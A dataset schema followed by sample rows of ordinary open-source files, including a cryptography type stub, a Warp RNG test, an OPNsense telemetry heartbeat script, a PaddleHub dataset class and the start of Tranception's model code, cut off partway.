Dataset schema (one row per source file; ranges are min/max observed across the dataset):

- blob_id: string (length 40)
- directory_id: string (length 40)
- path: string (length 4 to 721)
- content_id: string (length 40)
- detected_licenses: list (length 0 to 57)
- license_type: string (2 classes)
- repo_name: string (length 5 to 91)
- snapshot_id: string (length 40)
- revision_id: string (length 40)
- branch_name: string (321 classes)
- visit_date: timestamp[ns] (2016-08-12 09:31:09 to 2023-09-06 10:45:07)
- revision_date: timestamp[ns] (2010-09-28 14:01:40 to 2023-09-06 06:22:19)
- committer_date: timestamp[ns] (2010-09-28 14:01:40 to 2023-09-06 06:22:19)
- github_id: int64 (426 to 681M)
- star_events_count: int64 (101 to 243k)
- fork_events_count: int64 (0 to 110k)
- gha_license_id: string (23 classes)
- gha_event_created_at: timestamp[ns] (2012-06-28 18:51:49 to 2023-09-14 21:59:16, nullable)
- gha_created_at: timestamp[ns] (2008-02-11 22:55:26 to 2023-08-10 11:14:58, nullable)
- gha_language: string (147 classes)
- src_encoding: string (26 classes)
- language: string (2 classes)
- is_vendor: bool
- is_generated: bool
- length_bytes: int64 (6 to 10.2M)
- extension: string (115 classes)
- filename: string (length 3 to 113)
- content: string (length 6 to 10.2M)

The sample rows below list these fields in this order, with `|` separating the fields of each row.
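To make the schema above easier to work with programmatically, here is a minimal sketch of one row as a Python `TypedDict`. The field names mirror the columns listed above; the concrete runtime types (plain `str` for the timestamp columns, `Optional` for the nullable GHA columns) are assumptions made for illustration.

```python
from typing import List, Optional, TypedDict


class FileRecord(TypedDict):
    """One dataset row: a single source file plus its repository metadata."""
    blob_id: str                   # 40-character blob hash
    directory_id: str
    path: str                      # file path inside the repository
    content_id: str
    detected_licenses: List[str]   # e.g. ["Apache-2.0", "MIT"]
    license_type: str              # "permissive" or "no_license"
    repo_name: str                 # e.g. "JetBrains/intellij-community"
    snapshot_id: str
    revision_id: str
    branch_name: str               # e.g. "refs/heads/master"
    visit_date: str                # assumed ISO-8601 strings; stored as timestamp[ns]
    revision_date: str
    committer_date: str
    github_id: int
    star_events_count: int
    fork_events_count: int
    gha_license_id: Optional[str]  # nullable GHArchive fields
    gha_event_created_at: Optional[str]
    gha_created_at: Optional[str]
    gha_language: Optional[str]
    src_encoding: str              # e.g. "UTF-8"
    language: str                  # e.g. "Python"
    is_vendor: bool
    is_generated: bool
    length_bytes: int
    extension: str                 # e.g. "py", "pyi"
    filename: str
    content: str                   # full text of the file
```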
c8317dc01c7102faf412e5cac970595d6932983b
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/helpers/typeshed/stubs/cryptography/cryptography/hazmat/primitives/ciphers/modes.pyi
|
b99d7a89fc924cd0b35a79a678468ddff4710abe
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 3,067
|
pyi
|
modes.pyi
|
from abc import ABCMeta, abstractmethod

from cryptography.hazmat.primitives.ciphers import CipherAlgorithm

class Mode(metaclass=ABCMeta):
    @property
    @abstractmethod
    def name(self) -> str: ...
    @abstractmethod
    def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: ...

class ModeWithAuthenticationTag(metaclass=ABCMeta):
    @property
    @abstractmethod
    def tag(self) -> bytes: ...

class ModeWithInitializationVector(metaclass=ABCMeta):
    @property
    @abstractmethod
    def initialization_vector(self) -> bytes: ...

class ModeWithNonce(metaclass=ABCMeta):
    @property
    @abstractmethod
    def nonce(self) -> bytes: ...

class ModeWithTweak(metaclass=ABCMeta):
    @property
    @abstractmethod
    def tweak(self) -> bytes: ...

class CBC(Mode, ModeWithInitializationVector):
    def __init__(self, initialization_vector: bytes) -> None: ...
    @property
    def initialization_vector(self) -> bytes: ...
    @property
    def name(self) -> str: ...
    def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: ...

class CTR(Mode, ModeWithNonce):
    def __init__(self, nonce: bytes) -> None: ...
    @property
    def name(self) -> str: ...
    @property
    def nonce(self) -> bytes: ...
    def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: ...

class CFB(Mode, ModeWithInitializationVector):
    def __init__(self, initialization_vector: bytes) -> None: ...
    @property
    def initialization_vector(self) -> bytes: ...
    @property
    def name(self) -> str: ...
    def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: ...

class CFB8(Mode, ModeWithInitializationVector):
    def __init__(self, initialization_vector: bytes) -> None: ...
    @property
    def initialization_vector(self) -> bytes: ...
    @property
    def name(self) -> str: ...
    def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: ...

class ECB(Mode):
    @property
    def name(self) -> str: ...
    def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: ...

class GCM(Mode, ModeWithInitializationVector, ModeWithAuthenticationTag):
    def __init__(self, initialization_vector: bytes, tag: bytes | None = ..., min_tag_length: int | None = ...) -> None: ...
    @property
    def initialization_vector(self) -> bytes: ...
    @property
    def name(self) -> str: ...
    @property
    def tag(self) -> bytes: ...
    def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: ...

class OFB(Mode, ModeWithInitializationVector):
    def __init__(self, initialization_vector: bytes) -> None: ...
    @property
    def initialization_vector(self) -> bytes: ...
    @property
    def name(self) -> str: ...
    def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: ...

class XTS(Mode, ModeWithTweak):
    def __init__(self, tweak: bytes) -> None: ...
    @property
    def name(self) -> str: ...
    @property
    def tweak(self) -> bytes: ...
    def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: ...
|
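The stub above only declares the interfaces of the mode classes. As a brief usage sketch (not part of the stub), this is how the `cryptography` package combines one of these modes with a cipher algorithm; the key and IV values are illustrative placeholders:

```python
import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key = os.urandom(32)  # AES-256 key (placeholder)
iv = os.urandom(16)   # 128-bit initialization vector required by CBC

cipher = Cipher(algorithms.AES(key), modes.CBC(iv))
encryptor = cipher.encryptor()
# CBC input must be a multiple of the 16-byte AES block size; this message is exactly 16 bytes.
ciphertext = encryptor.update(b"sixteen byte msg") + encryptor.finalize()

decryptor = cipher.decryptor()
assert decryptor.update(ciphertext) + decryptor.finalize() == b"sixteen byte msg"
```

Recent versions of cryptography no longer require an explicit backend argument to `Cipher`; older versions would additionally pass `default_backend()`.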
46a324a4a1e6c8faf62db4ddc2e61a3ecfea0a40
|
bb33e6be8316f35decbb2b81badf2b6dcf7df515
|
/source/res/scripts/client/gui/miniclient/vehicle_compare/pointcuts.py
|
a86fc354c83a4d82967e205be94ed138432a290b
|
[] |
no_license
|
StranikS-Scan/WorldOfTanks-Decompiled
|
999c9567de38c32c760ab72c21c00ea7bc20990c
|
d2fe9c195825ececc728e87a02983908b7ea9199
|
refs/heads/1.18
| 2023-08-25T17:39:27.718097
| 2022-09-22T06:49:44
| 2022-09-22T06:49:44
| 148,696,315
| 103
| 39
| null | 2022-09-14T17:50:03
| 2018-09-13T20:49:11
|
Python
|
UTF-8
|
Python
| false
| false
| 414
|
py
|
pointcuts.py
|
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/miniclient/vehicle_compare/pointcuts.py
import aspects
from helpers import aop

class MakeVehicleCompareUnavailable(aop.Pointcut):

    def __init__(self):
        aop.Pointcut.__init__(self, 'gui.game_control.veh_comparison_basket', 'VehComparisonBasket', 'isAvailable', aspects=(aspects.MakeVehicleCompareUnavailable,))
|
758e6abc8926b400146f8b70d52975fbd6af380d
|
4fab2df0ca38e25f0dd88b23e386c6f76206c02e
|
/warp_maniskill/warp/tests/test_rand.py
|
13a7c36e9df7a7cb793cd19c625ba42215bed20f
|
[
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"CC-BY-NC-4.0"
] |
permissive
|
haosulab/ManiSkill2
|
96ea208e36a6f8bdd93ad20fdf57263539f7ea00
|
43546c3341be9e11f369dee1b80c1b201c9cd6ae
|
refs/heads/main
| 2023-08-18T01:15:44.557502
| 2023-08-17T16:37:37
| 2023-08-17T16:37:37
| 520,357,130
| 259
| 42
|
Apache-2.0
| 2023-09-07T18:54:42
| 2022-08-02T04:56:58
|
Python
|
UTF-8
|
Python
| false
| false
| 3,028
|
py
|
test_rand.py
|
# Copyright (c) 2022 NVIDIA CORPORATION. All rights reserved.
# NVIDIA CORPORATION and its licensors retain all intellectual property
# and proprietary rights in and to this software, related documentation
# and any modifications thereto. Any use, reproduction, disclosure or
# distribution of this software and related documentation without an express
# license agreement from NVIDIA CORPORATION is strictly prohibited.

import numpy as np
import warp as wp
from warp.tests.test_base import *

wp.init()


@wp.kernel
def test_kernel(
    kernel_seed: int,
    int_a: wp.array(dtype=int),
    int_ab: wp.array(dtype=int),
    float_01: wp.array(dtype=float),
    float_ab: wp.array(dtype=float)):

    tid = wp.tid()
    state = wp.rand_init(kernel_seed, tid)

    int_a[tid] = wp.randi(state)
    int_ab[tid] = wp.randi(state, 0, 100)
    float_01[tid] = wp.randf(state)
    float_ab[tid] = wp.randf(state, 0.0, 100.0)


def test_rand(test, device):
    N = 10

    int_a_device = wp.zeros(N, dtype=int, device=device)
    int_a_host = wp.zeros(N, dtype=int, device="cpu")
    int_ab_device = wp.zeros(N, dtype=int, device=device)
    int_ab_host = wp.zeros(N, dtype=int, device="cpu")
    float_01_device = wp.zeros(N, dtype=float, device=device)
    float_01_host = wp.zeros(N, dtype=float, device="cpu")
    float_ab_device = wp.zeros(N, dtype=float, device=device)
    float_ab_host = wp.zeros(N, dtype=float, device="cpu")

    seed = 42

    wp.launch(
        kernel=test_kernel,
        dim=N,
        inputs=[seed, int_a_device, int_ab_device, float_01_device, float_ab_device],
        outputs=[],
        device=device
    )

    wp.copy(int_a_host, int_a_device)
    wp.copy(int_ab_host, int_ab_device)
    wp.copy(float_01_host, float_01_device)
    wp.copy(float_ab_host, float_ab_device)
    wp.synchronize()

    int_a = int_a_host.numpy()
    int_ab = int_ab_host.numpy()
    float_01 = float_01_host.numpy()
    float_ab = float_ab_host.numpy()

    int_a_true = np.array([-575632308, 59537738, 1898992239, 442961864, -1069147335, -478445524, 1803659809, 2122909397, -1888556360, 334603718])
    int_ab_true = np.array([46, 58, 46, 83, 85, 39, 72, 99, 18, 41])
    float_01_true = np.array([0.72961855, 0.86200964, 0.28770837, 0.8187722, 0.186335, 0.6101239, 0.56432086, 0.70428324, 0.64812654, 0.27679986])
    float_ab_true = np.array([96.04259, 73.33809, 63.601555, 38.647305, 71.813896, 64.65809, 77.79791, 46.579605, 94.614456, 91.921814])

    test.assertTrue((int_a == int_a_true).all())
    test.assertTrue((int_ab == int_ab_true).all())

    err = np.max(np.abs(float_01 - float_01_true))
    test.assertTrue(err < 1e-04)

    err = np.max(np.abs(float_ab - float_ab_true))
    test.assertTrue(err < 1e-04)


def register(parent):
    devices = wp.get_devices()

    class TestNoise(parent):
        pass

    add_function_test(TestNoise, "test_rand", test_rand, devices=devices)
    return TestNoise


if __name__ == '__main__':
    c = register(unittest.TestCase)
    unittest.main(verbosity=2)
|
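The per-thread RNG pattern exercised by the test above (seed plus thread index into `wp.rand_init`, then repeated draws from the returned state) can be reduced to a short standalone sketch. The kernel and array names below are made up for illustration, but every warp call is one already used in the test file:

```python
import warp as wp

wp.init()

@wp.kernel
def draw_uniform(seed: int, out: wp.array(dtype=float)):
    tid = wp.tid()
    state = wp.rand_init(seed, tid)       # independent random stream per thread
    out[tid] = wp.randf(state, 0.0, 1.0)  # uniform float in [0, 1)

out = wp.zeros(8, dtype=float, device="cpu")
wp.launch(kernel=draw_uniform, dim=8, inputs=[42, out], device="cpu")
print(out.numpy())
```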
03bef0d778e59c74918ea6f3952cfb24b073b6e9
|
3b79167a9d0b756aa5809bc4938d662ac0387958
|
/ann_benchmarks/constants.py
|
03b3c4a2b41a6a65b03cd0e1f4db8fc290c04055
|
[
"MIT"
] |
permissive
|
erikbern/ann-benchmarks
|
09708cbe9db498dae3bb9d03c8a36ffd2cd213c6
|
fa9b8fcea27dd277dcbee240ffd763e9aac93299
|
refs/heads/main
| 2023-08-29T22:40:24.454703
| 2023-08-23T18:32:44
| 2023-08-23T18:32:44
| 36,439,741
| 4,036
| 677
|
MIT
| 2023-08-31T22:41:51
| 2015-05-28T13:21:43
|
Python
|
UTF-8
|
Python
| false
| false
| 22
|
py
|
constants.py
|
INDEX_DIR = "indices"
|
d293f5dccf755161523881b54894369b57c5cf12
|
8cd504360c1eefa2412a5a8f1fb1e02c06ae2877
|
/security/etpro-telemetry/src/opnsense/scripts/etpro_telemetry/send_heartbeat.py
|
c4805b1e0d122745ef26401500872f467bc10baa
|
[
"LicenseRef-scancode-proprietary-license",
"BSD-2-Clause"
] |
permissive
|
opnsense/plugins
|
71b041fc9b47d627f1b70fc84d23b06779e8ae76
|
37ea19d9130ffcf1ed462b52d729c23d3237fd52
|
refs/heads/master
| 2023-09-01T09:04:48.918688
| 2023-09-01T07:00:49
| 2023-09-01T07:01:23
| 38,818,223
| 790
| 905
|
BSD-2-Clause
| 2023-09-09T15:49:06
| 2015-07-09T12:13:51
|
PHP
|
UTF-8
|
Python
| false
| false
| 3,788
|
py
|
send_heartbeat.py
|
#!/usr/local/bin/python3
"""
Copyright (c) 2018-2019 Ad Schellevis <ad@opnsense.org>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
import sys
import argparse
import requests
import syslog
import time
import random
import urllib3
import json
import telemetry
import telemetry.system
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--endpoint',
help='Endpoint url to reach',
default="%s/api/v1/telemetry" % telemetry.BASE_URL)
parser.add_argument('-i', '--insecure',
help='Insecure, skip certificate validation',
action="store_true",
default=False)
parser.add_argument('-c', '--config',
help='rule downloader configuration',
default="/usr/local/etc/suricata/rule-updater.config"
)
parser.add_argument('-D', '--direct',
help='do not sleep before send (disable traffic spread)',
action="store_true",
default=False)
parser.add_argument('-t', '--test',
help='test mode, output request/response to stdout',
action="store_true",
default=False)
args = parser.parse_args()
exit_code = -1
cnf = telemetry.get_config(args.config)
if cnf.token is not None:
params = {'timeout': 5, 'headers': {'Authorization': 'Bearer %s' % cnf.token}}
if args.insecure:
params['verify'] = False
try:
# spread traffic to remote host, usual cron interval is 30 minutes
if not args.direct and not args.test:
time.sleep(random.randint(0, 1800))
params['json'] = telemetry.system.Stats().get()
if args.test:
print("push to \t%s " % args.endpoint)
print("payload : \t%s" % json.dumps(params['json']))
r = requests.post(args.endpoint, **params)
if args.test:
print("response %d : \t%s " % (r.status_code, r.text))
if r.status_code == 201:
# expected result, set exit code
exit_code = 0
else:
syslog.syslog(syslog.LOG_ERR, 'unexpected result from %s (http_code %s)' % (args.endpoint, r.status_code))
except requests.exceptions.ConnectionError:
syslog.syslog(syslog.LOG_ERR, 'connection error sending heartbeat to %s' % args.endpoint)
else:
syslog.syslog(syslog.LOG_ERR, 'telemetry token missing in %s' % args.config)
# exit
sys.exit(exit_code)
|
614db5b609de1c4d2c8aac85a16730f5a0146263
|
5095200e9ca55cd3a37af34ed44448c02e2a1bb5
|
/paddlehub/datasets/canvas.py
|
22e1aefe520812a3d01b9b0cc47d94659af88fd1
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/PaddleHub
|
8712603ef486c45e83eb0bc5725b0b3ed3ddbbde
|
b402610a6f0b382a978e82473b541ea1fc6cf09a
|
refs/heads/develop
| 2023-07-24T06:03:13.172978
| 2023-03-28T11:49:55
| 2023-03-28T11:49:55
| 162,672,577
| 12,914
| 2,239
|
Apache-2.0
| 2023-07-06T21:38:19
| 2018-12-21T06:00:48
|
Python
|
UTF-8
|
Python
| false
| false
| 1,938
|
py
|
canvas.py
|
# coding:utf-8
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import os
from typing import Callable

import paddle
import numpy as np

import paddlehub.env as hubenv
from paddlehub.vision.utils import get_img_file
from paddlehub.utils.download import download_data


@download_data(url='https://paddlehub.bj.bcebos.com/dygraph/datasets/canvas.tar.gz')
class Canvas(paddle.io.Dataset):
    """
    Dataset for colorization. It contains 1193 Monet paintings and 400 Van Gogh paintings,
    collected from https://people.eecs.berkeley.edu/~taesung_park/CycleGAN/datasets/.

    Args:
        transform(Callable): The method used to preprocess images.
        mode(str): The dataset split to prepare, either 'train' or 'test'.

    Returns:
        Dataset: An iterable object for data iterating.
    """

    def __init__(self, transform: Callable, mode: str = 'train'):
        self.mode = mode
        self.transform = transform

        if self.mode == 'train':
            self.file = 'train'
        elif self.mode == 'test':
            self.file = 'test'

        self.file = os.path.join(hubenv.DATA_HOME, 'canvas', self.file)
        self.data = get_img_file(self.file)

    def __getitem__(self, idx: int) -> np.ndarray:
        img_path = self.data[idx]
        im = self.transform(img_path)
        return im

    def __len__(self):
        return len(self.data)
|
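A minimal usage sketch for the Canvas dataset defined above. The import path is assumed from the file location, and the stand-in transform is a placeholder; a real pipeline would preprocess the image with paddlehub's vision transforms instead:

```python
from paddlehub.datasets.canvas import Canvas  # assumed module path, mirrors /paddlehub/datasets/canvas.py

def passthrough_transform(img_path: str):
    # Placeholder transform: a real one would load the image at img_path
    # and return a preprocessed numpy array.
    return img_path

train_set = Canvas(transform=passthrough_transform, mode='train')
print(len(train_set))  # number of training images under <DATA_HOME>/canvas/train
print(train_set[0])    # first sample after applying the transform
```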
1bb8ea7db3485c2d3ef7e9b2590d25a2ef949aef
|
cc127478f47a3af9d9ac3d4418cd2643ed510ded
|
/tests/test_server_sanity.py
|
2bbb7665d07de3ca580ea1c090c41631a5c594bd
|
[
"BSD-2-Clause",
"Apache-2.0"
] |
permissive
|
IntelLabs/nlp-architect
|
3830c8e778081246b6b04b8462b30f44f66d70fb
|
88b323678642d046415768ef7764523003000ed7
|
refs/heads/master
| 2023-09-03T21:02:10.518747
| 2022-11-07T16:21:47
| 2022-11-07T16:21:47
| 133,867,923
| 459
| 85
|
Apache-2.0
| 2022-11-07T15:30:53
| 2018-05-17T21:00:13
|
Python
|
UTF-8
|
Python
| false
| false
| 7,507
|
py
|
test_server_sanity.py
|
# # ******************************************************************************
# # Copyright 2017-2018 Intel Corporation
# #
# # Licensed under the Apache License, Version 2.0 (the "License");
# # you may not use this file except in compliance with the License.
# # You may obtain a copy of the License at
# #
# # http://www.apache.org/licenses/LICENSE-2.0
# #
# # Unless required by applicable law or agreed to in writing, software
# # distributed under the License is distributed on an "AS IS" BASIS,
# # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# # See the License for the specific language governing permissions and
# # limitations under the License.
# # ******************************************************************************
# # pylint: disable=redefined-outer-name
# # pylint: disable=c-extension-no-member
# import gzip
# import io
# import json
# import os
# import sys
# from io import open
# from os.path import dirname
# import hug
# import pytest
# import nlp_architect.server.serve
# from nlp_architect.server.serve import api
# from nlp_architect.utils.text import try_to_load_spacy
# if not try_to_load_spacy('en'):
# pytest.skip("\n\nSkipping test_server_sanity.py. Reason: 'spacy en' model not installed. "
# "Please see https://spacy.io/models/ for installation instructions.\n"
# "The terms and conditions of the data set and/or model license apply.\n"
# "Intel does not grant any rights to the data and/or model files.\n",
# allow_module_level=True)
# sys.path.insert(0, (dirname(dirname(os.path.abspath(__file__)))))
# headers = {"clean": "True", "display_post_preprocces": "True",
# "display_tokens": "", "display_token_text": "True",
# "IS-HTML": "False"}
# server_data_rel_path = 'fixtures/data/server/'
# def load_test_data(service_name):
# """
# load test data (input and expected response) for given service from 'tests_data.json'
# Args:
# service_name (str): the service name
# Returns:
# str: the test data of the service
# """
# with open(os.path.join(os.path.dirname(__file__), server_data_rel_path + 'tests_data.json'),
# 'r') as f:
# service_test_data = json.loads(f.read())[service_name]
# return service_test_data
# def assert_response_struct(result_doc, expected_result):
# # 1. assert docs list
# assert isinstance(result_doc, list)
# assert len(result_doc) == len(expected_result)
# # 2. assert the structure of doc item
# result_item = result_doc[0]
# expected_result_item = expected_result[0]
# assert isinstance(result_item, dict)
# for key in expected_result_item.keys():
# assert key in result_item
# # 3. assert the structure of doc item dict
# result_dict = result_item['doc']
# expected_result_dict = expected_result_item['doc']
# if isinstance(result_dict, list):
# result_dict = result_dict[0]
# expected_result_dict = expected_result_dict[0]
# assert isinstance(result_dict, dict)
# for key in expected_result_dict.keys():
# assert key in result_dict
# # 4. check CoreNLPDoc
# if 'sentences' in expected_result_dict.keys():
# assert isinstance(result_dict['sentences'], list)
# # assert sentence:
# assert isinstance(result_dict['sentences'][0], list)
# # assert word-token
# result_word_dict = result_dict['sentences'][0][0]
# expected_result_word_dict = expected_result_item['sentences'][0][0]
# for key in expected_result_word_dict.keys():
# assert key in result_word_dict
# # 5. check HighLevelDoc
# elif 'annotation_set' in expected_result_dict.keys():
# assert isinstance(result_dict['annotation_set'], list)
# assert isinstance(result_dict['spans'], list)
# result_spans = result_dict['spans'][0]
# expected_result_spans = expected_result_dict['spans'][0]
# assert isinstance(result_spans, dict)
# for key in expected_result_spans.keys():
# assert key in result_spans
# # 6. check displacy html rendering input
# elif 'arcs' in expected_result_dict.keys():
# assert isinstance(result_dict['arcs'], list)
# assert isinstance(result_dict['words'], list)
# result_arcs = result_dict['arcs'][0]
# expected_result_arcs = expected_result_dict['arcs'][0]
# assert isinstance(result_arcs, dict)
# for key in expected_result_arcs.keys():
# assert key in result_arcs
# result_words = result_dict['words'][0]
# expected_result_words = expected_result_dict['words'][0]
# assert isinstance(result_words, dict)
# for key in expected_result_words.keys():
# assert key in result_words
# @pytest.mark.parametrize('service_name', ['bist', 'ner'])
# def test_request(service_name):
# test_data = load_test_data(service_name)
# test_data['input']['model_name'] = service_name
# doc = json.dumps(test_data["input"])
# expected_result = json.dumps(test_data["response"])
# myHeaders = headers.copy()
# myHeaders["content-type"] = "application/json"
# myHeaders["Response-Format"] = "json"
# # pylint: disable=no-member
# response = hug.test.post(api, '/inference', body=doc, headers=myHeaders)
# assert_response_struct(response.data, json.loads(expected_result))
# assert response.status == hug.HTTP_OK
# @pytest.mark.parametrize('service_name', ['bist', 'ner'])
# def test_gzip_file_request(service_name):
# file_path = os.path.join(os.path.dirname(__file__), server_data_rel_path + service_name
# + "_sentences_examples.json.gz")
# with open(file_path, 'rb') as file_data:
# doc = file_data.read()
# expected_result = json.dumps(load_test_data(service_name)["response"])
# myHeaders = headers.copy()
# myHeaders["content-type"] = "application/gzip"
# myHeaders["Response-Format"] = "gzip"
# myHeaders["content-encoding"] = "gzip"
# # pylint: disable=no-member
# response = hug.test.post(api, '/inference', body=doc, headers=myHeaders)
# result_doc = get_decompressed_gzip(response.data)
# assert_response_struct(result_doc, json.loads(expected_result))
# assert response.status == hug.HTTP_OK
# @pytest.mark.parametrize('service_name', ['bist', 'ner'])
# def test_json_file_request(service_name):
# file_path = os.path.join(os.path.dirname(__file__), server_data_rel_path + service_name
# + "_sentences_examples.json")
# with open(file_path, 'rb') as file:
# doc = file.read()
# expected_result = json.dumps(load_test_data(service_name)["response"])
# myHeaders = headers.copy()
# myHeaders["Content-Type"] = "application/json"
# myHeaders["RESPONSE-FORMAT"] = "json"
# # pylint: disable=no-member
# response = hug.test.post(nlp_architect.server.serve, '/inference', body=doc, headers=myHeaders)
# assert_response_struct(response.data, json.loads(expected_result))
# assert response.status == hug.HTTP_OK
# def get_decompressed_gzip(req_resp):
# tmp_file = io.BytesIO()
# tmp_file.write(req_resp)
# tmp_file.seek(0)
# with gzip.GzipFile(fileobj=tmp_file, mode='rb') as file_out:
# gunzipped_bytes_obj = file_out.read()
# return json.loads(gunzipped_bytes_obj.decode())
|
b0a4ca9c42b5ae0ba53e5349cf7dd7af54ddc54b
|
27ac9607f178d74441eb11a0b73d3e9b9a799626
|
/tranception/model_pytorch.py
|
954244c96a4d918801d4b78e6e9cde81d7249f6b
|
[
"MIT"
] |
permissive
|
OATML-Markslab/Tranception
|
044530d3c5128c8a9430683669bce43ea2cdefdf
|
2ddf40e1db9d2d180d1b5fc9d1b39ad5b04fbb6d
|
refs/heads/main
| 2023-08-19T06:06:46.117947
| 2023-07-20T10:39:47
| 2023-07-20T10:39:47
| 495,165,462
| 101
| 27
|
MIT
| 2023-08-15T15:38:37
| 2022-05-22T20:06:11
|
Python
|
UTF-8
|
Python
| false
| false
| 45,439
|
py
|
model_pytorch.py
|
from dataclasses import dataclass
from typing import Optional, Tuple
import math
import os
import pandas as pd
import torch
from torch import nn
from torch.nn import CrossEntropyLoss, NLLLoss
import torch.nn.functional as F
from transformers import GPT2PreTrainedModel
from transformers.modeling_utils import (
Conv1D,
PreTrainedModel,
SequenceSummary,
find_pruneable_heads_and_indices,
prune_conv1d_layer,
)
from transformers.file_utils import (
ModelOutput,
add_code_sample_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
replace_return_docstrings
)
from transformers.modeling_outputs import (
BaseModelOutputWithPastAndCrossAttentions,
CausalLMOutputWithCrossAttentions,
SequenceClassifierOutputWithPast,
TokenClassifierOutput
)
from transformers.utils.model_parallel_utils import assert_device_map, get_device_map
from tranception.activations import tranception_ACT2FN
from tranception.config import TranceptionConfig
from tranception.outputs import (
TranceptionCausalLMOutputWithCrossAttentions,
)
from tranception.utils import msa_utils
from tranception.utils import scoring_utils
def nanmean(v, *args, inplace=False, **kwargs):
if not inplace:
v = v.clone()
is_nan = torch.isnan(v)
v[is_nan] = 0
return v.sum(*args, **kwargs) / (~is_nan).float().sum(*args, **kwargs)
def get_slopes(n, mode="standard_alibi", verbose=False):
"""
Function to compute the m constant for each attention head. Code has been adapted from the official ALiBi codebase at:
https://github.com/ofirpress/attention_with_linear_biases/blob/master/fairseq/models/transformer.py
"""
def get_slopes_power_of_2(n):
start = (2**(-2**-(math.log2(n)-3)))
ratio = start
return [start*ratio**i for i in range(n)]
if mode=="grouped_alibi":
n = n // 4
if math.log2(n).is_integer():
result = get_slopes_power_of_2(n)
else:
#Workaround when the number of heads is not a power of 2
closest_power_of_2 = 2**math.floor(math.log2(n))
result = get_slopes_power_of_2(closest_power_of_2) + get_slopes(2*closest_power_of_2)[0::2][:n-closest_power_of_2]
if mode=="grouped_alibi":
result = result * 4
if verbose:
print("ALiBi slopes: {}".format(result))
return result
class SpatialDepthWiseConvolution(nn.Module):
def __init__(self, head_dim: int, kernel_size: int = 3):
super().__init__()
self.kernel_size = kernel_size
self.conv = nn.Conv1d(in_channels=head_dim, out_channels=head_dim, kernel_size=(kernel_size,), padding=(kernel_size - 1,), groups=head_dim)
def forward(self, x: torch.Tensor):
batch_size, heads, seq_len, head_dim = x.shape
x = x.permute(0, 1, 3, 2).contiguous()
x = x.view(batch_size * heads, head_dim, seq_len)
x = self.conv(x)
if self.kernel_size>1:
x = x[:, :, :-(self.kernel_size - 1)]
x = x.view(batch_size, heads, head_dim, seq_len)
x = x.permute(0, 1, 3, 2)
return x
class TranceptionBlockAttention(nn.Module):
def __init__(self, config, is_cross_attention=False, SDWC_kernel_size=None):
super().__init__()
max_positions = config.max_position_embeddings
self.register_buffer(
"bias",
torch.tril(torch.ones((max_positions, max_positions), dtype=torch.uint8)).view(
1, 1, max_positions, max_positions
),
)
self.register_buffer("masked_bias", torch.tensor(-1e4))
self.embed_dim = config.hidden_size
self.num_heads = config.num_attention_heads
self.head_dim = self.embed_dim // self.num_heads
self.split_size = self.embed_dim
if self.head_dim * self.num_heads != self.embed_dim:
raise ValueError(
f"`embed_dim` must be divisible by num_heads (got `embed_dim`: {self.embed_dim} and `num_heads`: {self.num_heads})."
)
self.scale_attn_weights = config.scale_attn_weights
self.is_cross_attention = is_cross_attention
if self.is_cross_attention:
self.c_attn = Conv1D(2 * self.embed_dim, self.embed_dim)
self.q_attn = Conv1D(self.embed_dim, self.embed_dim)
else:
self.c_attn = Conv1D(3 * self.embed_dim, self.embed_dim)
self.c_proj = Conv1D(self.embed_dim, self.embed_dim)
